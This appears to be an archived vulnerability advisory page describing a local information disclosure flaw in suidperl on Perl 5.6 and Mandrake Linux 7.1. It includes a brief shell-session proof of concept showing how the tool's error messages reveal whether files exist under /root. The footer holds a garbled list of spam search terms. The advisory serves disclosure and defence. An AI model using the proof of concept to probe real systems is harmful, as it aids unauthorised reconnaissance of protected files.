about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , SuidPerl Information Disclosure Vulnerability


Title SuidPerl Information Disclosure Vulnerability
Published 2002-11-29-12:00AM
Updated 2002-11-30-04:21PM
Class Access Validation Error
CVE   CVE-MAP-NOMATCH
Remote  No
Local  Yes
Credit  Discovery of this vulnerability credited to zen-parse.
Vulnerable  Larry Wall Perl 5.6
MandrakeSoft Linux Mandrake 7.1
Not Vulnerable  
Code   The following proof of concept was provided:

bash-2.04$ ls -ald /root
drwxr-x--- 66 root root 8192 Nov 29 16:00 /root
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ls /root/.bashrc
ls: /root/.bashrc: Permission denied
bash-2.04$ suidperl /root/.bashrc
Script is not setuid/setgid in suidperl
bash-2.04$ suidperl /root/nonexistantfile
Can't open perl script "/root/nonexistantfile": No such file or directory
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 10:35:04 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.XXL.FR moviessexs t709t telugusexc www.89.c0m sexywwe Dolphin Sm Sexpictur@ sex13 farm GET /galle t415t www.bigpen vidio porn WWW89COM www.marrie cium www.kerala netopia 30 thirisa.se mambo Remo asteristk Www.xlxx.c sextube.co bangla des India coll THIRISHASE pinkword /index.php Www.larry yotoub.mus WWW89COM www.indase WWW89COM Www.sexoca Sex arabe mambo Remo phpnuke pe ashwariara bangla des Thrsha sex Vulnerabil News Searc news for c www.xxnx.c malayalamf Video naru 89,sexcom www.loving www.trish Www+Trisha